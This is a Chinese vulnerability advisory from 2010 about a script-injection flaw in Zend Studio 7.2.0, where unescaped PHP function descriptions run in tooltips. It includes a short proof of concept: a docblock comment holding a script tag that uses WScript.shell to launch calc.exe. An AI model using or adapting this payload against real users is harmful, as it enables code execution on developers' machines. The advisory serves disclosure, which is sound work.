发布日期：2010-07-12
更新日期：2010-07-13

受影响系统：

Zend Zend Studio 7.2.0

描述：

---

Zend Studio是Zend Technologies开发的PHP语言集成开发环境。

Zend Studio没有对PHP函数的描述进行转义或htmlencode编码便在tooltip对话框中显示，用户受骗打开了特制的PHP文件并通过tooltip显示了恶意函数描述就会导致注入并执行恶意代码。

<*来源：saiy1986 （saiy1986@gmail.com）
  
  链接：http://secunia.com/advisories/40437/
        http://marc.info/?l=full-disclosure&m=127874100613413&q=p5
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<?php

/**
* <script>new ActiveXObject("WScript.shell").Run('calc.exe',1,true);</script>");
*/
function a() {
}

然后打开函数a()的描述（键入a或移动鼠标）就会运行calc.exe。

建议：

---

厂商补丁：

Zend
----
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.zend.com/downloads

浏览次数：2771
严重程度：0（网友投票）